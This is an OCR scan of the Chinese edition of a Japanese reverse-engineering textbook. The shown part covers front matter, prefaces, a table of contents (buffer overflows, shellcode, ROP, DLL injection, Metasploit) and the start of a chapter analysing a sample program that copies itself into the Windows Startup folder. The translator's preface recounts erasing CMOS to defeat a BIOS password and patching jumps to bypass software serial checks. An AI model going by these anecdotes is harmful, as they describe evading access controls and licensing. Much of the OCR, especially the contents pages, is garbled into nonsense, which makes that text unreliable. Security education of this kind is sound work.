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图 灵 社 区 的 电子 书 没有 采用 专 有 客户 
端 ， 您 可 以 在 任意 设备 上 ， 用 自己 喜 
欢 的 浏览 器 和 PDF 阅读 器 进行 阅读 。 
但 您 购买 的 电子 书 仅 供 您 个 人 使 用 ， 
未 经 授权 ， 不 得 进行 传播 。 

我 们 愿意 相信 读者 具有 这 样 的 民 知 和 
觉悟 ， 与 我 们 共同 保护 知识 产权 。 
如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 对 
该 用 户 实施 包括 但 不 限于 关闭 该 帐号 
等 维权 措施 ， 并 可 能 追究 法 律 责任 。 
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sa 负责 逆向 工 
、 恶 意 软件 分 析 、 渗 透 测 试 等 工作 。 
ee 此 后 ， 在 株式 会 社 
Fourteenforty 技 术 研究 所 ( 现 更 名 为 株式 
会 社 FFRI) 从 事 计 算 机 安全 技术 研究 和 软 
件 开发 工作 。 
曾 参加 Black Hat Japan 2008 (日 本 ) 、 
HITCON 2011 (中 国人 台湾 ) 等 会 议 ， 并 发 
表 重 大 研究 成 果 。 著 有 《汇编 语言 教程 》 
(PVT 1 言语 OD) 教科 书 ) 、《TCP/IP 教 
程 》 (TCP/IPO) 教 科 叫 ) 等 。 
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1. OF I. O2 OH HT. 二进制 运算 D 
软件 开发 一 安全 技术 IV. CO TP301.6 @TP311.52 
中 国 版 本 图 书馆 CP 数据 核 字 (2015) 第 227832 号 
内 容 提 要 
本 书 通过 逆向 工程 ， 揭 开 人 们 熟知 的 软件 背后 的 机 器 语言 的 秘密 ， 并 教 给 读者 
读 懂 这 些 二 进 制 代码 的 方法 。 理 解 了 这 些 方法 ， 技 术 人 员 就 能 有 效 地 Debug， 防 止 
软件 受到 恶意 攻击 和 反 编 译 。 本 书 涵盖 的 技术 包括 : 汇编 与 反 汇 编 、 调 试 与 反 调试 、 
缓冲 区 溢出 攻击 与 底层 安全 、 钧 子 与 注入 、Metasploit 等 安全 工具 。 
本 书 适合 对 计算 机 原理 、 底 层 或 计算 机 安全 感 兴 趣 的 读者 阅读 。 
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字数 :260 千 字 2015 年 10 月 第 1 版 
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译 者 序 








这 是 一 本 讲 “ 底 层 ” 知 识 的 书 ， 不 过 似乎 现在 大 部 分 计算 机 用 户 都 
跟 底层 没 多 少 缘分 了 。 很 多 人 说 ， 写 汇编 语言 的 时 候 总 得 操心 寄存 器 ， 
*j C 语言 的 时 候 总 得 操心 内 存 ， 而 如 今 到 了 Web 当道 的 时 代 ， 不 但 底 
层 的 事情 完全 用 不 着 操心 了 ， 就 连 应 用 层 的 事情 也 有 大 把 的 框架 来 玲 你 
搞定 。 想 想 看 ， 现 在 连 大 多 数 程序 员 都 不 怎么 关心 底层 了 ， 更 不 要 说 数 
量 更 多 的 一 般 用 户 了 。 当 然 ， 这 其 实 是 一 件 好 事 ， 这 说 明 技术 进步 了 ， 
分 工 细 化 了 ， 只 需要 一 小 部 分 人 去 研究 底层 ， 剩 下 大 部 分 人 都 可 以 享受 
他 们 的 伟大 成 果 ， 把 精力 集中 在 距离 解决 实际 问题 更 近 的 地 方 ， 这 样 才 
能 解放 出 更 多 的 生产 力 。 

话说 回来 ， 底 层 到 底 指 的 是 什么 呢 ? 现代 数字 计算 机 自问 世 以 来 已 
经 过 了 将 近 60 年 ， 在 这 60 年 中 ， 计 算 机 的 制造 技术 、 性 能 、 外 观 等 都 
发 生 了 翻天 覆 地 的 变化 ， 然 而 其 基本 原理 和 结构 依然 还 是 1946 4E15 e Vir 
依 曼 大 神 所 描绘 的 那 一 套 。 冯 ，。 诺 依 曼 结 构 的 精髓 在 于 ， 处 理 器 按照 顺 
序 执行 指令 和 操作 数据 ， 而 无 论 指令 还 是 数据 ， 它 们 的 本 质 并 没有 区 
别 ， 都 是 一 串 二 进 制 数字 的 序列 。 换 名 话说 ,“ 二 进 制 ”就 是 现代 计算 
机 的 最 底层 。 我 们 现在 用 计算 机 上 网 、 聊 天 、 看 视频 、 玩 游戏 ， 根 本 不 
会 去 考虑 二 进 制 层面 的 问题 ， 不 过 较 早 接触 计算 机 的 一 代 人 ， 其 实 都 曾 
经 离 底层 很 近 ， 像 这 本 书 里 面 所 讲 的 调试 器 、 反 汇编 峰 、 二 进 制 编辑 
器 、 内 存 编辑 器 等 ， 当 初 可 都 是 必 备 的 法 宝 ， 也 给 我 们 这 一 代 人 吾 来 过 
很 多 乐趣 。 

在 MS-DOS 时 代 ， 很 多 人 都 用 过 一 个 叫 debug 的 命令 ,这 就 是 一 个 
非常 典型 的 调试 器 。 准 确 地 说 ，debug 的 功能 已 经 超出 了 调试 器 的 范畴 ， 





























































































































iv | 译 者 序 





除了 调试 之 外 ， 它 还 能 够 进行 汇编 、 反 汇编 、 内 存 转 储 ， 甚 至 直接 修改 
磁盘 扇 区 ， 癸 然 是 那个 年 代 的 一 把 “瑞士 军刀 "”。 我 上 初中 的 时 候 ， 学 
校 上 计算 机 课 用 的 电脑 在 BIOS 里 禁用 了 软驱 ， 而 且 还 设置 了 BIOS 密 
码 ， 于 是 我 运行 depug， 写 几 条 汇编 指令 ,调用 系统 中 断 强 行 抹 掉 
CMOS 数据 ， 重 启 之 后 显示 CMOS 数据 异常 ， 于 是 BIOS 设置 被 恢复 到 
默认 状态 ， 软 驱 也 就 可 以 用 了 ， 小 伙伴 们 终于 可 以 把 游戏 带 来 玩 了 。 当 
然 ， 学 校 老师 后 来 还 是 找到 我 谈话 ， 原 因 仅仅 是 因为 我 在 信息 学 奥赛 得 
过 奖 ， 他 们 觉得 除了 我 以 外 不 可 能 有 别人 干 得 出 这 种 事 了 ……… 

很 多 资历 比较 老 的 PC 游戏 玩家 其 实 也 都 和 二 进 制 打 过 交道 ， 比 如 
说 ， 大 家 应 该 还 记得 一 个 叫 “ 整 人 专家 FPE” 的 软件 。 如 果 你 曾经 用 过 
“ 整 人 专家 ”， 那 么 这 本 书 第 2 章 中 讲 的 那个 修改 游戏 得 分 的 桥 段 你 一 定 
是 再 熟悉 不 过 了 。 除 了 修改 内 存 中 的 数据 ， 很 多 玩家 应 该 也 用 二 进 制 编 
中 器 修改 过 游戏 存档 ， 比 如 当年 的 《金庸 群 侠 传 汉人 仙剑 奇 侠 传 》 改 金 
钱 道 具 能 力 值 那 还 是 初级 技巧 ， 还 有 一 些 高 级 技巧 ， 比 如 改 各 种 游戏 中 
的 flag， 这 样 错过 开启 隐藏 分 支 的 条 件 也 不 怕 不 怕 啦 。 此 外 ， 各 种 破解 
游戏 激活 策略 的 补丁 也 是 通过 调试 和 反 汇 编 研 究 出 来 的 ， 我 也 曾经 用 
SoftICE 玩 过 一 点 逆向 工程 ， 找 到 判断 是 否 注册 激活 的 逻辑 ， 然 后 用 一 
个 无 条 件 跳 转 替 换 它 ， 或 者 是 跳 过 序列 号 的 校 验 逻 辑 ， 不 管 输入 什么 序 
列 号 都 能 激活 。 

精通 二 进 制 的 人 还 懂得 如 何 压榨 出 每 一 个 比特 的 能 量 。 说 到 这 一 
点 ， 不 得 不 提 易 易 大 名 的 64k-intro 大 赛 。 所 谓 64k-intro， 就 是 指 用 一 段 
程序 来 产生 包含 图 像 和 声音 的 演示 动画 ， 而 这 段 程序 ( 可 执行 文件 ) 的 
大 小 被 限制 为 64KB (65536 FI), WA, H iPhone 随便 拍 一 张 照 片 
就 得 差不多 2MB 大 小 ， 相 当 于 64KB 的 32 倍 ， 然 而 大 神 们 却 能 在 
64KB 的 空间 里 塞 下 长 达 十 几 分 钟 的 3D 动画 和 音乐 ， 着实 令 人 惊叹 不 
已 。 我 第 一 次 看 到 64k-intro 作品 是 在 上 初中 的 时 候 ， 当 时 某 一 期 《大 众 
软件 》 杂 志 对 此 做 了 介绍 ， 光 盘 里 还 附带 了 相应 的 程序 文件 。 当 我 在 自 
已 的 电脑 上 亲自 和 运行， 看 到 美 轮 美 人 的 3D 动画 时 ， 瞬 间 就 被 二 进 制 的 
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奇妙 感动 了 。 

二 进 制 的 乐趣 不 胜 枚 举 ， 其 实 最 大 的 乐趣 莫 过 于 “打开 黑箱 ”所 带 
来 的 那 种 抽 丝 剥 划 的 快感 。 和 夸张 点 说 ， 这 和 物理 学 家 们 探求 “大 统一 理 
论 ”， 不 断 逼 近 宇 宙 终 极 规律 的 过 程 中 所 体验 到 的 那 种 快感 上 有 蜡 曲 同 
TZU. WA, 二 进 制 的 可 能 性 是 无 穷 无 尽 的 ， 这 本 书 所 涉及 的 也 只 是 
其 中 很 小 的 一 方面 ， 但 正如 作者 在 前 言 中 所 说 的 那样 ,希望 大 家 能 够 借 
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2015 年 8 月 于 上 海 





责 声明 
本 书 的 内 容 以 提供 信息 为 目的 ， 在 使 用 本 书 的 过 程 中 ， 读 者 需要 自己 做 出 判断 并 
承担 相应 的 责任 。 对 于 读者 因 使 用 本 书 中 的 信息 所 造成 的 任何 后 果 ， 作者、 技术 评论 
社 、 译 者 、 人 民 邮 电 出 版 社 息 不 负责 。 
本 书 中 的 内 容 基于 2013 年 7 月 12 日 的 最 新 信息 编写 ， 在 读者 实际 阅读 时 可 能 已 
经 发 生变 化 。 
此 外 ， 软 件 方面 由 于 其 版 本 的 更 新 ， 可 能 会 与 本 书 中 所 描述 的 功能 和 画面 存在 差 

异 。 在 购买 本 书 之 前 ， 请 务必 确认 您 所 使 用 的 软件 版 本 。 
各 位 读者 在 阅读 本 书 之 前 ， 请 同意 并 遵守 上 述 注意 事项 。 如 果 没 有 阅读 上 述 事项 ， 
那么 对 于 由 此 产生 的 问题 ， 出 版 社 和 作 译 者 可 能 也 无 法 解决 ， 敬 请 各 位 读者 理解 。 
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关于 商标 和 注册 商标 
本 书 中 所 涉及 的 产品 名 称 ， 一般 皆 为 相应 公司 的 商标 或 者 注册 商标 ， 在 本 书 正文 
PEREM, © 等 标记 。 
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如 今 ， 计 算 机 已 经 深入 千家 万 户 ， 为 我 们 的 生活 带 来 了 很 多 方便 。 
但 与 此 同时 ， 计 算 机 系统 也 变 得 越 来 越 复杂 ， 技 术 人 员 需 要 学 习 的 知 
识 也 与 日 俱 增 。 和 过 去 相 比 ， 计 算 机 技术 中 难以 理解 的 黑箱 也 越 来 越 
£r. 




















e 操作 系统 到 底 是 干什么 的 ? 

e CPU 和 内 存 到 底 是 干什么 的 ? 

。 软件 为 什么 能 够 运行 ? 

。 为 什么 会 存在 安全 漏洞 ? 

。 为 什么 攻击 者 能 够 运行 任意 代码 ? 








要 想 回答 上 面 这 些 问 题 ， 我 们 需要 用 到 以 汇编 为 代表 的 二 进 制 层面 
的 知识 。 

尽管 现在 正 是 Web 应 用 如 日 中 天 的 时 候 ， 但 二 进 制 层面 的 知识 依然 
能 够 在 关键 时 刻 发 挥 作用 。 例 如 : 

“用 C/C++ 开发 的 程序 出 现 了 不 明 原 因 的 bug， 看 了 源 代码 还 是 找 
不 到 原因 。” 

在 这 样 的 情况 下 ， 即 便 不 会 编写 汇编 代码 ， 只 要 能 看 懂 一 些 汇编 语 
言 ， 就 可 以 通过 调试 带 立 刻 锁定 发 生 bug 的 位 置 ， 迅 速 应 对 。 

此 外 ， 如 果 别 人 编写 的 库 里 有 bug， 那 么 即便 看 不 到 源 人 代码， 我们 
也 能 够 对 其 内 部 结构 进行 分 析 ， 并 找到 避 开 问题 的 方法 ， 也 可 以 为 库 的 
开发 者 提供 更 有 帮助 的 信息 。 

再 举 个 例子 。 学 习 汇编 能 够 更 好 地 理解 CPU 的 工作 原理 ， 从 而 能 
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够 处 理 系统 内 核 、 驱 动 程序 这 一 类 近乎 于 黑箱 的 底层 问题 ， 对 于 实际 的 
底层 开发 工作 也 非常 有 帮助 。 

不 过 ， 说 实在 的 ,“ 有 没有 帮助 ”“ 流 不 流行 ”这 些 都 不 重要 ， 从 个 
人 经 验 来 看 ， 因 为 感觉 “好 像 有 用 ”“ 好 像 有 帮助 ”而 开始 学 习 的 东西 ， 
最 后 基本 上 都 没有 真正 掌握 ( 笑 )。 当 然 ， 也 许 是 因为 我 天 资 愚 钝 ， 不 
过 我 们 在 上 学 的 时 候 ， 老 师 天 天 教导 我 们 要 好 好 学 习 ， 可 是 实际 上 有 几 
个 人 真 的 好 好 学 习 了 呢 ? 虽然 我 没 做 过 统计 ， 但 从 感觉 来 看 ， 整 个 日 本 
也 许 还 不 到 1% 吧 。 

那么 问题 来 了 ， 要 想 真 正 学 会 一 件 事 ， 到 底 需 要 什么 呢 ? 

我 是 从 初中 时 代 开 始 学 习 编 程 的 ， 尽 管 当时 完全 没有 想 过 将 来 要 当 
程序 员 ， 靠 技术 吃饭 ， 但 我 依然 痴迷 于 计算 机 ， 每 天 编程 到 深 更 半夜 ， 
甚至 影响 了 学 习 成 绩 ， 令 父母 担 优 。 

为 什么 当时 的 我 如 此 痴迷 于 计算 机 而 无 法 自拔 呢 ?” 那 是 因为 “编程 
太 有 趣 了 ”。 自 己 编写 的 代码 能 够 按照 设想 运行 起 来 ,或 者 是 没有 按照 
设想 运行 起 来 ， 青 去 查找 原因 ， 这 些 事情 都 为 我 带 来 了 莫大 的 乐趣 。 

我 编写 这 本 书 ， 也 是 为 了 让 大 家 对 技术 感到 “有 趣 "， 并 且 “ 想 了 
解 得 更 多 "。 而 在 编写 这 本 书 的 过 程 中 ， 我 再 一 次 感到 ， 在 不 计 其 数 的 
编程 语言 中 ， 汇 编 语言 是 最 “有 趣 ” 的 一 种 。 

如 果 你 突然 觉得 “ 讲 底层 问题 的 书 好 像 插 有 意思 的 ”而 买 了 这 本 
书 ， 那 么 我 相信 ， 这 本 书 一 定 能 够 为 你 带 来 超出 预期 的 价值 。 
希望 大 家 能 够 通过 这 本 书 ， 感 受到 二 进 制 世界 的 乐趣 。 


































































































I 








目录 


第 1 


1.1 


1.2 


1.3 





章 ， 通 过 逆向 工程 学 习 如 何 读 懂 二 进 制 代码 …………… | 
ERRER TRAE ceccectecenctntctnctnene 3 
1.1.1. 通过 Process Monitor 的 日 志 来 确认 程序 的 行为 ………………… 4 
14.2. AGEBH E IE BE AE ERU a nen eec ce ceteceeeceeetneetnnen 6 
1.1.3 什么 是 逆向 工程 RE 9 
TS. EPAPER IIR eee eeneteenetrirenetinnse 0 
T e eA SERRE manned 1 
jb. dei nis af d S eea 1 
专栏 Stirling 与 BZ Editor 的 区 别 eee 2 
122 Fae SB BE EEG 3 
1.2.3 看 不 懂 汇 编 语 言 也 可 以 进 行 分 析 TT E T, 4 
1.2.4 在 没有 源 代 码 的 情况 下 搞 清 楚 星 序 的 行为 —————ÁÁÁ— 6 
i25 MRF eaaa 8 
dà Qi Ee dao 20 
1.3.1 328 Process Monitor 的 过 滤 规 则 ee 20 
132 调试 器 是 干什么 用 的 TT eer er rere rere rare ere tree TTA TT 93 


1.3.3 用 OllyDbg 洞察 程序 的 详细 逻辑 T———— S 24 




















X K 
1.3.4 对 反 汇 编 代 码 进 行 分 析 PA TTE 26 
专栏 : 什么 是 寄存 器 "——————— PA P 28 
1.3.5 将 分 析 结 果 与 源 代 码 进行 比较 有 29 
专栏 : 选择 自 已 喜欢 的 调试 器 mu ——— E 30 
1.4 学 习 最 基础 的 汇编 指令 —— ——————Á—— —— 32 
1.4.1 没 必 要 记 住 所 有 的 汇编 指令 "———————— — 32 
1.4.2 汇编 语言 是 如 何 实现 条 件 分 支 的 本 33 
1.4.3 参数 存放 在 栈 中 人 35 
1.4.4 从 汇编 代码 联想 到 (e 语言 源 代 码 ETE 37 
1.5 通过 汇编 指令 洞察 程序 行为 人 40 
1.5.1 给 函数 设置 断 点 ————————— sae 40 
1.5.2 反 汇 编 并 观察 重要 逻辑 PA EE E 42 
专栏 : 学 习 编 写 汇 编 代 码 二 的 的 en E eed ER MEE IR REX ances 47 
第 2 章 EIER PERREN emn B1 
2.1 解读 内 存 转 储 PE TE ANARTEAN EA ANES EERO AESAAT SENARRAK AS RSK AAAKIK AERAJ 53 
2.1.1 射击 游戏 的 规则 rE AET PLAI E A A IATA AT 53 
2.1.2 修改 4 个 字 节 就 能 得 高 分 —€————————Á———— 54 
2.1.3 获取 内 存 转 储 Oe ed tear andeaednadusdceeaeeesens bees 58 
2.1.4 ”从 进程 异常 终止 瞬间 的 状态 查找 崩溃 的 原因 ………………… 63 
2.1.5 有 效 运用 实时 调试 和 66 


2.1.6 通过 转 储 文 件 寻找 出 错 原因 TEE 68 




















专栏 : 除了 个 人 电脑 ， 在 其 他 计算 机 设备 上 运行 的 程序 也 可 以 进行 





Pr f ————— 74 
专栏 : 分 析 Java B AJE eee 74 
22 ”如 何 防止 软件 被 别人 分 析 eeen 76 
noi REE rn 76 
专栏 E UMS TERE RO SETS RE 7 
aoo MORERA RP ED ieiuna atu ees 79 
E a e e E 80 
055 将 可 执行 文件 进行 压缩 ee 81 
224 将 压缩 过 的 可 执行 文件 解压 缩 : ROG e 86 
225 “通过 手动 解 包 UPX 来 理解 其 工作 原理 9 eee 87 
226 ”用 硬件 断 点 对 ASPack 进行 解 包 ee 91 
专栏 : 如 何 分 析 NET 编写 的 应 用 程序 Me 95 
第 3 章 “ 利 用 软件 的 漏洞 进行 攻击 RN 97 
3.1 利用 缓冲 区 溢出 来 执行 任意 代码 ee 99 
3.1.1 引发 缓冲 区 溢出 的 示例 程序 ene 99 
3.1.2， 让 普通 用 户 用 管理 员 权限 运行 程序 e ees 00 
313 ARE UT SERE eene 102 
3.1.4” 栈 是 如 何 使 用 内 存 空 间 的 mee 104 
31.5 ire ig ee eens 07 
3.1.6 FA gdb 2535 ARIE (TAN BERE ee 10 
dd GRR ga er cee: 13 




















xii ES 
3.1.8 生成 可 用 作 shellcode HILE E 4B 116 
3.1.9 xj 0x00 的 改进 fto eis ET T ENOR EE ARE TIO PR att oo KS dese PRAE ERE REPRE ade La 121 
EX : printf JE p ZI BE HR Bisse bug eT CERE 125 
32 防御 攻击 的 技术 SR 127 
3.2.1 地 址 随机 化 : ASLR ——————— 127 
3.2.2 ” 除 存放 可 执行 代码 的 内 存 空间 以 外 ， 对 其 余 内 存 空 间 尽 量 
禁用 执行 权限 : Exec-Shield ——— ——— — 130 
3.2.3 ”在 编译 时 插入 检测 栈 数据 完整 性 的 代码 : StackGuard — 131 
3.3 绕 开 安全 机 制 的 技术 Rs 134 
3.3.1 使 用 libc 中 的 函数 来 进行 攻击 : Return-into-libe ……………… 134 
3.3.2 ”利用 未 随机 化 的 模块 内 部 的 汇编 代码 进行 攻击 : ROP……………… 136 
专栏 : 计算 机 安全 为 什么 会 变 成 猫 鼠 游戏 ………… e M 137 
第 4 章 “自由 控制 程序 运行 方式 的 编程 技巧 ……………… 199 
4.1 通过 自制 调试 器 来 理解 其 原理 ——————— 141 
4.1.1 亲手 做 一 个 简单 的 调试 器 ， 在 实践 中 学 习 ——————— 141 
4.1.2 调试 器 到 底 是 怎样 工作 的 "———————— 141 
4.1.3 实现 反 汇 编 功能 iita AOE FOO PFT que ene ne dna sa edt casa Foro OT Abc eia auci de 147 
4.1.4 运行 改良 版 调试 器 pE—————————— — 153 
4.2 在 其 他 进程 中 运行 任意 代码 : 代码 注入 ———— € 155 
4.2.1 向 其 他 进程 注入 代码 eT 155 


4.2.2 用 SetWindowsHookEx 支持 系统 消息 PIE IERE EEE 155 























ES xiii 

4.2.3 将 DLL 路 径 配 置 到 注册 表 的 Applnit DLLs Dp 162 

4.2.4 通过 CreateRemoteThread 在 其 他 进程 中 创建 线程 …………… 65 

4.2.5 注入 函数 EEEE EEA E I EEE S TE E T O ETTET 170 

4.3 任意 替换 程序 逻辑 : API F —————————— 74 
4.3.1 API 钧 子 的 两 种 类 型 A RE PEREAT MeL cie 74 

4.3.2 用 Detours 实现 一 个 简单 的 API 钩子 PE ho podindoapsadcagri grad iaeia 74 

4.3.3 (KGE HE ARR BI eene 77 

专栏 : DLL 注入 和 API 钩子 是 “黑客 ”技术 的 代表 ? oe 78 
第 5 章 ”使 用 工具 探索 更 广阔 的 世界 e 179 
5.1 用 Metasploit Framework 验证 和 调查 漏洞 saa de det 81 
5.1.1 什么 是 Metasploit Framework eeeeeeeeeereretteetetetessneneteeeeen 181 

5.1.2 安全 漏洞 的 信息 从 何 而 来 re EE 81 

5.1 .3 搭建 用 于 测试 漏洞 的 环境 —————————————— ES 82 

5.1.4 利用 漏洞 进行 攻击 Ni de a TETINE 83 

专栏 : 深入 探索 shellcode HA 84 

5.1.5 一 个 ROP 的 实际 例子 PE PE PAL A A ERR UNUM ON DUIS TET 188 

5.2 用 EMET 观察 反 ROP 的 机 制 whet pia PE EE EEE EE E 92 
5.2.1 什么 是 EMET ^m eee 92 

5.22 Anti-ROP 的 设计 获得 了 蓝 帽 奖 ——— A 92 

5.2.3 如 何 防止 攻击 I I NIU UNE 193 

5.24 搞 清 楚 加 载 器 的 逻辑 OAP SER Alaa iS tee Si Ra acl eal Sere yc aan ala deanna ae 94 





xiv 


5.3 


5.4 


5.5 


5.6 























R 
sos DU 的 程序 逻辑 erecta terete arai itia 196 
5.2.6 ”CALLRETN aie oe eee ete 197 
B57 inh nui eee eee 200 
DUREE v2 e a A i QOL DL M Gidea 201 
用 REMnux 4) HERE EE SU s 205 
5.3.1 “什么 是 REMnUX see te tele 205 
530 I 10 1-- crenata 206 
533. - - 1 t 206 
用 ClamAV 检测 恶意 软件 和 漏洞 攻击 o 208 
541 ClamAV BYSEGESL E ntt 208 
5.4.2 解压 缩 oyd JE ee eee 209 
54.3 ”被 检测 到 的 文件 详细 信息 e 210 
5.4.4. ”检测 所 使 用 的 打包 器 以 及 疑似 恶意 软件 的 文件 pp 211 
用 Zero Wine Tryouts EE SE 212 
5.5.1. REMnux 与 Zero Wine Tryouts BUD SI. 212 
5S 所 生机 制 Ee 212 
6a BS Hae anne 213 
554 PISNE e e E 214 
zdgE.SHEPEBBELE-e——— 217 
REWN/UCAIOS:IRBEXBUR teeta 218 
5.6.1. 恶意 软件 应 对 极限 的 到 来 : 平均 每 天 60000 4 008 218 
5.6.2 启发 式 技术 革命 218 


5.6.3 用 两 个 恶意 软件 进行 测试 TT TT Facer A Etat 220 




















ES XV 


附 m ——————Ó 223 
SEE. IDA 224 
A2 ”安装 OllyDbg «eene 229 
A3 "E WinDbg nennen 230 
AA BE Visual Studio 2010 — eee esses 235 
A5 安装 Metasploit-—nee 240 
A.6 分析 工具 248 
Stirling / BZ Editor «entente 248 
所 249 
Process Explorer ee 250 
Sysinternals T. «netten tients 250 
[3:513 e ——— 251 
r ro»4 C H———— 252 
|j —————M————— 254 


第 1 章 
通过 逆向 工程 学 习 
如 何 读 懂 二 进 制 代码 














2 | 第 1 章 通过 逆向 工程 学 习 如 何 读 懂 二 进 制 代码 


大 家 是 否 听 说 过 “逆向 工程 ”这 个 词 呢 ? 

逆向 工程 原本 是 指 通 过 拆 解 机 带 装 置 并 观察 其 运行 情况 来 推导 其 制 
造 方法 、 工 作 原理 和 原始 设计 的 行为 ,但 在 软件 领域 ,逆向 工程 主要 指 
的 是 阅读 反 汇 编 〈 将 机 器 语言 代码 转换 成 汇编 语言 代码 ) 后 的 代码 ， 以 
及 使 用 调试 器 分 析 软 件 行为 等 工作 。 

程序 员 都 应 该 知道 ， 处 理 器 是 通过 解释 和 执行 机 器 语言 代码 来 运行 
程序 的 ， 但 对 现在 的 程序 员 来 说 ， 对 机 器 语言 代码 进行 反 汇 编 并 跟踪 其 
行为 并 不 是 一 项 必 备 技能 。 换 句 话 说 ,“ 知 道 是 知道 ， 但 没 亲自 尝试 过 ” 
这 种 情况 比较 普遍 。 

笔者 是 一 位 喜爱 汇编 语言 的 工程 师 ， 但 也 并 不 认为 上 面 的 现象 有 什 
么 问题 。 实 际 上 ， 我 自己 除了 汇编 以 外 ， 平 时 也 经 常 使 用 C、Python、 
JavaScript 等 其 他 语言 。 不 过 ， 有 些 东 西 适合 用 C、Python 、JavaScript 
来 编写 ， 同 样 也 有 一 些 东西 适合 用 汇编 语言 来 编写 。 更 进一步 说 ， 在 某 
些 技术 领域 中 ， 不 懂 汇编 就 无 法 工作 。 

经 常 和 处 理 器 层面 的 东西 打交道 的 工程 师 被 称 为 Binarian 。 尽 管 这 
些 人 并 不 能 说 多 么 伟大 ， 但 他 们 的 确 运 用 着 很 多 鲜 为 人 知 的 技术 ,你 想 
不 想 玩 玩 看 呢 ? 

在 本 章 中 ， 我 们 将 通过 软件 的 逆向 工程 ， 探 索 一 下 二 进 制 世界 的 
奥秘 。 






















































































(D 这 是 一 个 日 本 人 造 出 来 的 词 ， 英 文中 没有 这 个 词 。 译 者 注 
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1.4 先 来 实际 体验 一 下 软件 分 析 吧 








下 面 我 们 就 来 动手 尝试 一 下 逆向 工程 。 

"WE? 你 还 什么 都 没 教 呢 1” 

没关系 ， 也 许 大 家 印象 里 觉得 逆向 工程 是 很 难 的 ， 其 实 这 里 面 有 一 
半 是 误会 ， 因 为 分 析 的 难度 取决 于 你 要 分 析 的 对 象 。 有 些 软 件 很 难 进行 
分 析 ，, 但 也 有 一 些 则 很 容易 。 

这 里 我 们 准备 了 一 个 简单 的 “恶意 ”程序 ， 然 后 从 下 面 三 个 要 点 来 
进行 分 析 。 





















































。 文件 的 创建 、 修 改 和 删除 
。 注册 表 项 目的 创建 、 修 改 和 删除 
。 网 络 通信 








如 果 我 们 能 对 上 述 三 个 方面 进行 监控 ,那么 就 不 难 跟踪 软件 的 
行为 。 
这 里 我 们 需要 下 面 三 个 工具 。 

















e Stirling” ( 二 进 制 编辑 器 ) 
http://www.vector.co.jp/soft/win95/util/se079072.html 


e Process Monitor ( 文件 和 注册 表 监 控 ) 
http://technet.microsoft.com/en-us/sysinternals/bb896645 


* Wireshark ( 网 络 监控 ) 


http://www.wireshark.org/ 





(D 这 个 软件 仅 在 日 本 的 圈子 里 有 名 ， 软 件 也 只 有 日 文 界面 ， 如 果 不 习惯 可 以 使 用 其 
他 类 似 工 具 (如 WinHex ) 来 替代 。 译 者 注 
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二 进 制 代码 





T 


我 们 先 启动 Process Monitor 和 Wireshark， 修 改 配 置 以 启用 日 志 
输出 。 
本 书 中 的 所 有 示例 文件 均 可 从 以 下 地 址 下 载 。 





https://github.com/kenjiaiko/binarybo ok? 


本 次 的 分 析 对 象 为 chap01\sample mal\Release 目录 中 的 sample mal. 
exe 文件 ， 请 大 家 运行 这 个 文件 。 

运行 sample_mal.exe 后 ， 应 该 会 弹出 一 个 内 容 为 “Hello Malware!" 
的 对 话 框 。 

关闭 对 话 框 之 后 ，sample_mal.exe 文件 本 身 也 会 消失 。 





ps 





1.1.1 通过 Process Monitor 的 日 志 来 确认 程序 的 行为 
下 面 我 们 来 看 一 下 Process Monitor 的 日 志 。 





V Process Monitor 的 运行 结果 ( 文件 访问 ) 


ZjProcess Nonitor — Sysinternals: www.sysinternals. com 
File Edit Event Filter Tools Options Help 


SH| Ial? FAQA AS | | 





Time of Day Process Name PID Operation 


Se sample mal. exe createpile C:\Documents and dettine Pm [Hi] 让 


口 :ample_mal. eze 3008 BACloseFile C:\Documents and SettingsAXPXUser [Fig] 菜单 \ 程 序 \ 自 动 SUCCESS 
.. []sample mal.eze 3008 四 QueryhttributeI... C:\Documents and Settings\XPMUser\ [AWA] MARFA SO. exe SUCCESS 
口 sample_mal. exe 3008 BA QueryBasicInfor... C:\Documents and Settings\XPMUser\ [开始 」 荣 单 \ 程 序 \ 咎 动 \0. exe SUCCESS 
Clsample_mal.exe 3008 BAQueryAttributel... C:\M\sample_mal. exe SUCCESS 
.. []sample mal.eze 3008 BR SetEndOfFileInf... C:\Documents and Settings\xPMUser\ [开始 | 菜单 \ 程 序 \ 咎 动 \0. exe SUCCESS 
[sample mal.eze 3008 ERCreateFileMapping C:\M\sample_mal. exe SUCCESS 
.. [sample mal.exe 3008 BAQueryStandardin. .. C:\M\sample_mal. exe SUCCESS 
[]sample mal.exe 3008 EACreateFileMapping C:\M\sample_mal. exe SUCCESS 
.. []sample mal.eze 3008 BR RriteFile C:\Documents and Settings\xPMUser\ [FG] 菜单 \ 程 序 \ 咎 动 \0. exe SUCCESS 
[]sample mal.exe 3008 BÀ SetBasicInforma... C:\Documents and SettingsAXPXUser [开始 」 AART VSO. exe SUCCESS 
.. Dsample_mal. exe 3008 BACloseFile C:\M\sample_mal. exe SUCCESS 
. Cl sample_mal. eze 3008 EACloseFile C:\Documents and Settings VUPMUserV [ 开 怒 | 菜单 \ 程 序 \ 咎 动 \0. exe SUCCESS 
3:22:49. 285... []sample mal.exe 3008 Ø RegCreateKey HKCU\ Sof tware\Mi crosoft\Rindows\CurrentVersion\Ezplorer\User S... SUCCESS M 


| > 


Showing 1,838 of 203,873 events (0.87%) Backed by virtual memory 


通过 跟踪 Process Monitor 的 日 志 ， 我 们 可 以 发 现 程序 在 以 下 位 置 进 
行 了 CreateFile 操作 。 











(D 译 者 fork 了 这 个 项 目 ， 并 对 其 中 的 说 明文 件 和 源 代 码 注释 等 进行 了 翻译 ， 大 家 可 
以 从 这 里 访问 : https://github.com/shyujikou/binarybook, ——i##4 iz 
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e C:\Documents and SettingsXXPMUsen [开始 | 菜单 \ 程 序 \ 启 
动 \0.exe 
Windows XP 的 情况 。 

e CAUsers 用 户 名 \AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\0.exe 
Windows Vista 及 更 高 版 本 的 情况 。AppData 为 隐藏 文件 夹 。 


存放 在 “启动 ”文件 夹 中 的 程序 ， 会 随 着 Windows 启动 自动 运行 。 

请 大 家 注意 ， 我 们 的 示例 程序 连续 执行 了 CreateFile, WriteFile 和 
CloseFile 这 几 个 操作 ， 这 些 操 作 加 起 来 的 功能 相当 于 “在 指定 文件 夹 创 
建 并 写 人 一 个 名 为 0.exe 的 文件 ”。 

我 们 来 实际 确认 一 下 。 





V 确认 “启动 ”文件 夹 中 的 内 容 


RAE) ”编辑 下) BE) 收藏 入 TAG) 9588500 


Qa- 0- B Js px [iu 











